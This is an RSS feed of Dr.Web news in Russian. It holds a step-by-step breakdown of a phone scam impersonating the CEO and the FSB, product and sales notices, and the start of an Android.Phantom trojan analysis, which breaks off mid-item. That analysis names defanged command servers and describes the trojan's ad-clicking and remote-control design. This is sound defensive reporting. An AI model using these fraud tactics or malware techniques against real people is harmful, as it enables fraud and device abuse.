<?xml version="1.0"?>
<rss version="2.0"><channel><title>Все новости</title><link>https://news.drweb.ru/news/</link><description>Новости компании "Доктор Веб" - Все новости</description><image><url>https://st.drweb.com/static/drweb_logo_ru.gif</url><link>https://news.drweb.ru/news/</link><title>Антивирус Dr.Web</title></image><item><guid>https://news.drweb.ru/show/?i=15120&amp;lng=ru</guid><title>«У вас произошла утечка персональных данных!». Анатомия мошеннического звонка</title><link>https://news.drweb.ru/show/?i=15120&amp;lng=ru&amp;c=5</link><pubDate>Mon, 09 Feb 2026 11:35:33 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Телефонное мошенничество остается насущной проблемой нашего общества, несмотря на постоянное противодействие со стороны государства, банков и операторов связи. Никто не застрахован от обмана: в ловушку преступников может попасть как ребенок или пенсионер, так и искушенный взрослый.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Чтобы детально разобрать мошенническую схему и предостеречь других потенциальных жертв, сотрудница «Доктор Веб» «прошла» весь путь от первого звонка до финальной попытки выманить деньги. Это была сложносоставная комбинация с применением различных методов социальной инженерии.&lt;/p&gt;&lt;h2&gt;Этап 1. Давление авторитетом&lt;/h2&gt;&lt;p&gt;Мошенники атаковали коллектив компании «Доктор Веб» еще с декабря 2024 года. Они выходили на разных сотрудников с одним и тем же заходом: произошла утечка конфиденциальных данных, началось расследование, с вами свяжется куратор из ФСБ. Коммуникация всегда велась якобы от лица генерального директора или другого представителя руководящего звена компании. Поскольку данный подход не привел к желаемым результатам, преступники сменили тактику и сфокусировались на пожилых сотрудниках.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Пенсионеры — наиболее привлекательная для мошенников группа населения. Они более доверчивы, меньше разбираются в современных технологиях и имеют сформировавшееся уважение к представителям власти. Кроме того, пенсионеры уже не работают в компании (по крайней мере, именно так считают мошенники), поэтому хуже разбираются в том, кто текущий руководитель, как он разговаривает, что у него за характер.&lt;/p&gt;&lt;p&gt;Утром на телефон нашей сотрудницы, для краткости назовем ее N, поступил звонок через Телеграм. Звонящий представился генеральным директором «Доктор Веб», что подтверждалось его реальными фото и именем/фамилией. Но его аккаунт был создан менее суток назад, номер телефона скрыт, а голос и манера общения резко отличались от привычных. Злоумышленник ввел N в контекст произошедшей ситуации. Якобы произошла утечка персональных данных внутри компании. Для расследования инцидента создана специальная комиссия. Составлен список лиц, которые обязаны дать показания о случившемся. N также внесена в этот перечень, поэтому в течение дня ей позвонит сотрудник ФСБ. Планируемые каналы связи: мессенджер MAX или Телеграм. Если не получится связаться с N через них, поступит обычный звонок на мобильный номер. И поскольку скомпрометированы в том числе личные данные самой N, ей следует с полной серьезностью отнестись к разговору.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Примечателен факт, что мошенники всегда действуют под маской вышестоящего руководителя, пытаясь задавить авторитетом. Но зачастую это прикрытие и выдает их: они не знают внутренних взаимоотношений, корпоративной культуры, порядка принятия решений внутри компании, что раскрывает их ложь. Поэтому и стали атаковать пенсионеров!&lt;/p&gt;&lt;p&gt;Самым примечательным моментом данного этапа стало использование мессенджеров. Сотрудники правоохранительных органов всегда звонят напрямую на телефонный номер. Звонки через Телеграм или MAX — это коммуникация через интернет, что не предусмотрено для силовых ведомств.&lt;/p&gt;&lt;h2&gt;Этап 2. Демонстрация легитимности&lt;/h2&gt;&lt;p&gt;Далее в игру вступает «представитель ФСБ» — майор, старший следователь по особо важным делам. Он звонит N через Телеграм, но разговор не получается из-за отсутствия соединения. Лжемайор присылает сообщение, в котором представляется и прикрепляет фото своего удостоверения.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Подобные фотографии рассчитаны на доверчивых и невнимательных людей или тех, кто никогда не имел взаимоотношений с силовыми ведомствами:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;фотография удостоверения на столе ничего не доказывает — мы не видим лица автора съемки, оно может не совпадать с фото в документе,&lt;/li&gt;&lt;li&gt;удостоверение предъявляют только при личном контакте, а не посылают через интернет,&lt;/li&gt;&lt;li&gt;сотрудники «Доктор Веб» за несколько минут нашли в открытом доступе шаблоны подобных документов, куда с помощью ИИ можно вставить любое ФИО и фото. Получившиеся изображения неотличимы от подлинных фотографий.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Поскольку дозвониться через Телеграм не получилось, лжемайор предлагает продолжить общение в национальном мессенджере МАХ, который позиционируется как безопасный. Вот только он не может найти N в мессенджере и предлагает ей самой прислать приглашение для запуска чата. Но даже после этого у мошенника не получается дозвониться, так как у N стоит ограничение — звонки только от абонентов из списка контактов. Поэтому он предлагает N самостоятельно позвонить в чате. Эти манипуляции необходимы для создания иллюзии достоверности и укрепления атмосферы доверия, ведь слишком быстрый и простой контакт может навести на подозрения. В итоге связь была установлена и разговор продолжился в течение часа.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Этот небольшой, но важный эпизод показывает, что введенные не так давно ограничения средств связи не работают так, как было задумано. Злоумышленники используют социальную инженерию, чтобы заставить жертв звонить им самостоятельно — без разницы где. Не стоит вопрос безопасности и защищенности MAX или Телеграм, поскольку тот или другой мессенджер выступают просто в роли инструмента связи. Статистика утверждает, что количество мошеннических звонков снизилось — но взамен выросло их качество. Преступники перестали практиковать массовые обзвоны и сосредоточились на точечных операциях.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Мы не будем подробно пересказывать все перипетии беседы, остановимся на нескольких моментах, важных для понимания техники обмана. Прежде всего лжемайор пытался убедить N в подлинности своей личности. Он предложил зайти на официальный сайт Федеральной службы безопасности, перейти в раздел «Справочная информация», затем выбрать конкретный округ Москвы, посмотреть контактный номер подразделения и своими глазами убедиться, что контакт в Телеграме совпадает. Цифры действительно были те же, вот только в профиле контакта этот телефонный номер указан в строке «Имя». А в самом мессенджере MAX контакт мошенника зарегистрирован со скрытым номером.&lt;/p&gt;&lt;h2&gt;Этап 3. Эскалация и прессинг&lt;/h2&gt;&lt;p&gt;Лжемайор настаивал и даже требовал соблюдения строгой конфиденциальности во время беседы и после нее. Он несколько раз заострил внимание, что собеседница должна находиться в комнате одна и никто не имеет права помешать разговору — даже члены семьи. Для большего эффекта были названы имена домочадцев N. Далее по ходу разговора притворяющийся майором несколько раз переспрашивал, одна ли N в комнате, и подчеркивал необходимость соблюдения строжайшей секретности.&lt;/p&gt;&lt;p&gt;По мере развития беседы раскручивалась мошенническая легенда, параллельно с усилением напряжения. Злоумышленник подтвердил слова первого звонившего о том, что произошла утечка персональных данных и силовое ведомство подозревает кого-то из руководителей компании или HR-специалистов. Росфинмониторингом была пресечена попытка крупного денежного перевода от лица N на нужды ВСУ. Приведем небольшой отрывок, чтобы продемонстрировать отработку возражений:&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;N: &lt;/strong&gt;Простите, но тут какая-то ошибка. Я не держу такие большие суммы на счетах, поэтому их просто физически невозможно перевести куда-либо.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Лжемайор: &lt;/strong&gt;Попытка перевода могла быть совершена и с кредитного счета, не обязательно депозит.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;N: &lt;/strong&gt;Возможно, но я специально для таких случаев оформила самозапрет на оформление кредитов.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Лжемайор: &lt;/strong&gt;К сожалению, самозапрет на дает 100% гарантии. Некоторые нечистоплотные сотрудники коммерческих банков могут игнорировать предписания ради собственной выгоды. Учтите, если мы зафиксируем очередную попытку перевода, вы будете главной подозреваемой. Придется возбуждать дело и разбираться.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Наша сотрудница была готова к подобному повороту событий, но, как правило, такого рода обвинения производят ошеломляющий эффект. Речь идет не о рядовой краже — об измене Родине. Для людей пожилого возраста это чудовищное преступление. После таких слов сложно сохранить присутствие духа, рассуждать логично, сосредоточиться на несостыковках. Ситуацию усугубляет осознание того, что жертве предъявляют обвинения, которые практически невозможно опровергнуть: кто-то где-то на стороне воспользовался персональными данными, но главный подозреваемый — вы!&amp;nbsp;&lt;/p&gt;&lt;p&gt;Для усиления психологического давления, лжемайор присылал изображения разных документов: письмо из Росфинмониторинга в ФСБ с просьбой об инициировании расследования и повестка о вызове в качестве подозреваемого. Наши юристы внимательно изучили их и выделили детали, указывающие на фальшивое происхождение. Мы приводим только некоторые из них, так как детальный публичный разбор ошибок в фальшивых документах потенциально вооружает преступников:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;повестки не направляются через мессенджеры, об этом неоднократно заявляли представители правоохранительных органов;&lt;/li&gt;&lt;li&gt;текст повестки краток и не содержит разъясняющих и угрожающих формулировок;&lt;/li&gt;&lt;li&gt;согласно ст. 188 УПК РФ «Порядок вызова на допрос» повесткой на допрос может быть вызван только свидетель или потерпевший. Подозреваемого задерживают, согласно ст. 92 УПК РФ «Порядок задержания подозреваемого». Такой документ, как «Повестка о вызове подозреваемого на допрос» не может существовать согласно юридическим нормам.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Люди не в состоянии обращать внимание на подобные нюансы, оказавшись под давлением. &lt;/p&gt;&lt;h2&gt;Этап 4. Кульминация комбинации&lt;/h2&gt;&lt;p&gt;Переходим к главному пункту мошенничества, ради которого затевалась комбинация. Лжемайор перечислил N банки, где находятся ее счета: Сбер, Альфа, Озон и ОТП-банк. Последний — некая венгерская кредитная организация, через которую будто бы совершаются переводы на Украину. Заботливый лжемайор высказал пожелание предотвратить возможное преступление и защитить N от карающей длани Фемиды. Для этого он передаст заявку в ЦБ, откуда с потенциальной жертвой свяжется сотрудник и поможет «все правильно сделать» (предположительно, перевести деньги на безопасный счет).&lt;/p&gt;&lt;p&gt;К этому моменту N уже определила основные черты схемы и решила прервать общение. Но злоумышленник не хотел отпускать добычу. Прикрываясь статьей 205.6 УК РФ «Несообщение о преступлении», он заявил, что ему бы очень не хотелось, чтобы N потом пыталась связаться с ним, обрывая его телефон с просьбой помочь. Но поскольку N отказалась от сотрудничества, лжемайор уведомил, что вынужден обратиться к регулятору для блокировки счетов и наложения ареста на имущество, в том числе ближайших родственников, а далее прислать повестку. На этом общение с лжемайором завершилось.&lt;/p&gt;&lt;h2&gt;Этап 5. Провоцирование повторного контакта&lt;/h2&gt;&lt;p&gt;Поскольку мошенники не добились своей главной цели, они попытались спровоцировать N саму связаться с ними. Буквально через несколько минут героине позвонили из Сбера и попросили подтвердить подачу заявки на блокировку карты. После отрицательного ответа карта заблокирована не была.&lt;/p&gt;&lt;p&gt;В свою очередь, Альфа-банк прислал несколько СМС о блокировке каждой из карт. Для решения проблемы N пришлось позвонить на горячую линию и сделать запрос об отмене. Как оказалось, одна из соучастниц мошенничества ранее также позвонила на горячую линию и представилась N. Назвав полностью ФИО, а также дату рождения, преступница попросила заблокировать карты. Для сотрудника банка этих данных оказалось достаточно.&amp;nbsp;&lt;/p&gt;&lt;h2&gt;Выводы&lt;/h2&gt;&lt;p&gt;Инцидент не стал удачным для мошенников благодаря&amp;nbsp;принятым предупредительным мерам в «Доктор Веб». Атаки активно происходили в течение всего 2025 года, поэтому все сотрудники компании были неоднократно проинструктированы и имели четкие внутренние регламенты, как действовать в подобных случаях.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Сотрудница N, будучи опытным и высококвалифицированным специалистом, провела диалог с мошенниками не спонтанно, а осознанно и хладнокровно, следуя внутренним инструкциям. Именно они не позволили эмоциям взять верх над логикой и вниманием к деталям. Контакт помог собрать ценную информацию&amp;nbsp;без какого-либо риска или ущерба, превратив потенциальную угрозу в детальный разбор мошеннической схемы.&lt;/p&gt;&lt;p&gt;Таким образом, устойчивость к мошенничеству строится на:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;четких корпоративных правилах, дающих сотрудникам однозначный алгоритм действий,&lt;/li&gt;&lt;li&gt;постоянном обучении и регулярном повышении осведомленности, превращающих каждого сотрудника в осознанного участника системы безопасности.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Именно подобный комплексный и системный подход, в отличие от технических блокировок, создает настоящий щит, способный противостоять социальной инженерии, и вселяет в сотрудников уверенность в своей правоте. Мы хотим обратить особое внимание руководителей организаций, что именно от их активной роли зависит, насколько весь коллектив будет готов к подобным атакам и манипуляциям.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15119&amp;lng=ru</guid><title>Прекращена продажа решений Dr.Web по подписке через ПАО «Ростелеком»</title><link>https://news.drweb.ru/show/?i=15119&amp;lng=ru&amp;c=5</link><pubDate>Fri, 06 Feb 2026 17:21:38 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» информирует, что с 6 февраля 2026 года прекращена продажа новых лицензий и продление действующих подписок через ПАО «Ростелеком».&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Что необходимо знать пользователям:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Ваши устройства все еще под защитой Dr.Web. Антивирус полноценно функционирует до последнего дня действия лицензии. Мы гарантируем бесперебойную работу, полную техническую поддержку, своевременное обновление антивирусных баз и всех компонентов программы.&lt;/li&gt;&lt;li&gt;Для продолжения защиты вам необходимо приобрести новую лицензию в нашем официальном интернет-магазине после окончания срока действия вашей текущей лицензии от ПАО «Ростелеком».&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Чтобы сделать переход на прямое обслуживание «Доктор Веб» плавным, простым и выгодным, мы подготовили специальное предложение для абонентов ПАО «Ростелеком»: дополнительные 30 дней защиты в подарок.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Чтобы им воспользоваться, нужно сделать следующее:&lt;/strong&gt;&lt;/p&gt;&lt;ol&gt;&lt;li&gt;После окончания действия лицензии удалите текущую версию антивируса Dr.Web, установленную через ПАО «Ростелеком».&lt;/li&gt;&lt;li&gt;Оформите новую подписку&lt;a href="https://www.drweb.ru/saas/tariffs/2home/"&gt; на официальном сайте «Доктор Веб»&lt;/a&gt;, используя промокод АНТИВИРУС. Он дает право при покупке подписки Dr.Web Персональный, Мобильный или Расширенный на 30 дней на любое количество устройств получить дополнительно еще 30 дней в подарок. Таким образом, вы заплатите за 30 дней, а подписка продлится 60.&lt;/li&gt;&lt;li&gt;Скачайте дистрибутив с нашего сайта и установите его.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Получить дополнительную информацию о предложении или задать вопросы о переходе можно специалистам Службы поддержки продаж «Доктор Веб».&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15117&amp;lng=ru</guid><title>Получены сертификаты соответствия ФСБ России на продукты Dr.Web Desktop Security Suite, Dr.Web Server Security Suite и Dr.Web Enterprise Security Suite</title><link>https://news.drweb.ru/show/?i=15117&amp;lng=ru&amp;c=5</link><pubDate>Mon, 02 Feb 2026 13:19:07 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» сообщает, что получены новые сертификаты соответствия ФСБ России на программные продукты Dr.Web Desktop Security Suite, Dr.Web Server Security Suite и Dr.Web Enterprise Security Suite.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Рекомендуем пользователям обновить свое ПО до новой сертифицированной версии.&amp;nbsp;&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Подробнее о продуктах&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Desktop Security Suite для ОС Windows:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;версия 12.0.8,&lt;/li&gt;&lt;li&gt;&lt;a href="https://company.drweb.ru/licenses_and_certificates/fsb/"&gt;сертификат соответствия № СФ/СЗИ-0844&lt;/a&gt;,&lt;/li&gt;&lt;li&gt;срок действия: 05.12.2025 — 31.10.2030,&lt;/li&gt;&lt;li&gt;средство антивирусной защиты Классов В2 и Г2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности»,&lt;/li&gt;&lt;li&gt;продукт предназначен для защиты информации в информационных системах, в том числе в государственных информационных системах, в которых обрабатывается информация как конфиденциального характера, так и содержащая совершенно секретные сведения.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Server Security Suite для ОС Windows:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;версия 12.0.8,&lt;/li&gt;&lt;li&gt;&lt;a href="https://company.drweb.ru/licenses_and_certificates/fsb/"&gt;сертификат соответствия № СФ/СЗИ-0843&lt;/a&gt;,&lt;/li&gt;&lt;li&gt;срок действия: 05.12.2025 — 31.10.2030,&lt;/li&gt;&lt;li&gt;средство антивирусной защиты Класса Б2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности»,&lt;/li&gt;&lt;li&gt;продукт предназначен для защиты информации в информационных системах, в том числе в государственных информационных системах, в которых обрабатывается информация как конфиденциального характера, так и содержащая совершенно секретные сведения.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Enterprise Security Suite:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;версия 13,&lt;/li&gt;&lt;li&gt;&lt;a href="https://company.drweb.ru/licenses_and_certificates/fsb/"&gt;сертификат соответствия № СФ/СЗИ-0873&lt;/a&gt;,&lt;/li&gt;&lt;li&gt;срок действия: 29.01.2026 — 29.01.2031,&lt;/li&gt;&lt;li&gt;средство антивирусной защиты Классов А2, Б2, В2 и Г2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности»,&lt;/li&gt;&lt;li&gt;продукт применяется для защиты информации в информационных системах, в том числе в государственных информационных системах, в которых обрабатывается информация как конфиденциального характера, так и содержащая совершенно секретные сведения,&lt;/li&gt;&lt;li&gt;решение предназначено для организации и управления единой и надежной комплексной антивирусной защитой внутренней сети компании, включая мобильные устройства.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Напоминаем, что поставки лицензий на сертифицированные продукты Dr.Web сопровождаются полным комплектом сертификационных материалов.&amp;nbsp;&lt;/p&gt;&lt;p&gt;По вопросам обновления ПО или приобретения продуктов Dr.Web обращайтесь к партнерам или к специалистам &lt;a href="https://support.drweb.ru/"&gt;Службы поддержки продаж «Доктор Веб»&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15114&amp;lng=ru</guid><title>Акция для бизнеса и государственных учреждений: переход на Dr.Web со скидкой 50%</title><link>https://news.drweb.ru/show/?i=15114&amp;lng=ru&amp;c=5</link><pubDate>Fri, 30 Jan 2026 11:50:53 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;С 1 февраля 2026 года компания «Доктор Веб» запускает акцию для бизнеса и государственных учреждений — скидка 50% при переходе на решения Dr.Web с антивирусов других производителей.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Акция действует д&lt;strong&gt;о 31 декабря 2026 года включительно&lt;/strong&gt; и распространяется на продукты Dr.Web для бизнеса и госучреждений:&amp;nbsp;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web Desktop Security Suite — защита рабочих станций,&lt;/li&gt;&lt;li&gt;Dr.Web Server Security Suite — защита серверов,&lt;/li&gt;&lt;li&gt;Dr.Web Mobile Security Suite — защита мобильных устройств и планшетов,&lt;/li&gt;&lt;li&gt;Dr.Web Mail Security Suite — проверка почтового трафика,&lt;/li&gt;&lt;li&gt;Dr.Web Gateway Security Suite — проверка интернет-трафика,&lt;/li&gt;&lt;li&gt;Dr.Web ATM Shield — защита встроенных устройств,&lt;/li&gt;&lt;li&gt;Комплект для малого бизнеса — оптимальное решение для малого бизнеса.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Предложение адресовано организациям, которые:&lt;/strong&gt;&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;strong&gt;Планируют переход на ПО Dr.Web&lt;/strong&gt;&lt;br&gt;Ранее не использовали продукты Dr.Web для бизнеса и госучреждений, но планируют переход с решений других вендоров.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Ранее использовали ПО Dr.Web&lt;/strong&gt;&lt;br&gt;Использовали решения Dr.Web в прошлом, но не приобретали лицензии со скидкой по программе миграции «Переходи на зеленый» на соответствующие продукты.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Планируют расширение лицензии&lt;/strong&gt;&lt;br&gt;Используют Dr.Web Desktop Security Suite для защиты от 1 до 5 рабочих станций и готовы в рамках акции увеличить лицензию от 50 до 250 рабочих станций или приобрести другие продукты Dr.Web в соответствии с условиями акции.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;strong&gt;Общие условия:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Организация должна иметь действующую или истекшую не более 30 дней назад лицензию другого производителя на аналогичные защищаемые объекты.&lt;/li&gt;&lt;li&gt;Акция не применяется, если организация ранее уже приобретала желаемый продукт по программе миграции «Переходи на зеленый».&lt;/li&gt;&lt;li&gt;Скидка предоставляется на одно-, двух- или трехлетние лицензии в рамках действующего прайс-листа.&lt;/li&gt;&lt;li&gt;Скидка не суммируется с другими акционными предложениями.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Как воспользоваться акцией&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Для участия в Акции обратитесь к партнерам «Доктор Веб» либо воспользуйтесь сервисом &lt;a href="https://products.drweb.ru/biz/v4"&gt;«Конструктор лицензий для бизнеса и госучреждений»&lt;/a&gt;.&amp;nbsp;&lt;br&gt;Дополнительную информацию можно получить у партнеров или у специалистов &lt;a href="https://support.drweb.ru/"&gt;Службы поддержки продаж «Доктор Веб»&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15110&amp;lng=ru</guid><title>Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов</title><link>https://news.drweb.ru/show/?i=15110&amp;lng=ru&amp;c=5</link><pubDate>Wed, 21 Jan 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;21 января 2026 года&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (&amp;gt;34 тыс. скачиваний), Amazing Unicorn Party (&amp;gt;13 тыс. скачиваний), Академия мечты Сакура (&amp;gt;4 тыс. скачиваний), Theft Auto Mafia (&amp;gt;61 тыс. скачиваний), Open World Gangsters (&amp;gt;11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.&lt;/p&gt;&lt;p&gt;В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).&lt;/p&gt;&lt;p&gt;В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt; загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; в директорию приложения. В сценариях для работы с некоторыми видами рекламы&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.&lt;/p&gt;&lt;p&gt;В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Далее&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.&lt;/p&gt;&lt;p&gt;15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;в них встроили модуль&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Он является дроппером, который содержит внутри себя загрузчик удаленного кода&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.4.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;— они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.&lt;/p&gt;&lt;p&gt;Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, троян&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;получил возможность использовать загрузчик удаленного кода&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.4.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;для загрузки необходимой библиотеки.&lt;/p&gt;&lt;p&gt;Злоумышленники используют также и другие каналы распространения троянов&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Spotify 